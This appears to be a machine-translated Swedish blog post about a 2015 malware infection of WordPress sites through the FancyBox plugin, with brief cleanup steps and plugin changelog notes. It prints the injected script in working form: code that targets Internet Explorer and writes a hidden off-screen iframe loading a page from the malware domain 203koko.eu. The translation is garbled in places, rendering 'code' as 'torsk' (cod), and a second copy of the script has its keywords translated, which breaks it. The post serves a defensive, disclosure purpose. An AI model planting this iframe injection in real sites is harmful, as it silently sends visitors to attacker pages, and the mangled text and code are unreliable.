I början av veckan WordPress, fick varningar om skadlig infektion genom Google Webasters.
Problemet vid vilket Google Webasters hänvisar till är närvaron av en torsk / manus Iframe skadlig kod på källan till webbsidorna.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Det verkar vara en sårbarhet en pluginförvärvaFancybox för WordPress som fram till igår (05.02.2015) inte hade uppdaterats på länge.
Lösa detta problem och desinficera virussidor Med denna skadlig programvara är det relativt enkelt.
1. Inaktivera plugn fancybox.
2. Ta bort alla Fancybox -plugin -filer på servern (via FTP)
3. Installera den nya versionen av plugin (FancyBox 3.0.4)
FancyBox för WordPress 3.0.4
– Döpte namn till den inställning som påverkas av säkerhetsfrågan som nämns i 3.0.3. Detta bör hindra den skadliga koden från att visas på webbplatser där plugin uppdateras utan att ta bort den skadliga koden.
FancyBox för WordPress 3.0.3
– Fixade en säkerhetsfråga.
Malware Info:
Typ: IFRAME -omdirigering
Mål: WordPress FancyBox
Malware Domain: 203Koko.eu
Malware Uri: http://203koko.eu/hjnfh/ipframe2.php
Rawkod för skadlig kod: <iframe src =”http://203koko.eu/hjnfh/ipframe2.php” bredd =”20″ höjd =”30″ ></iframe>
Malware -skript: <manus>if (navigator.UserAgent.Match (/msie/i)) {Document.Write (‘ <div -stil =”Position: Absolut; Vänster: -2000px; Bredd: 2000px”>
Ta bort skadlig programvara från din WordPress -webbplats.
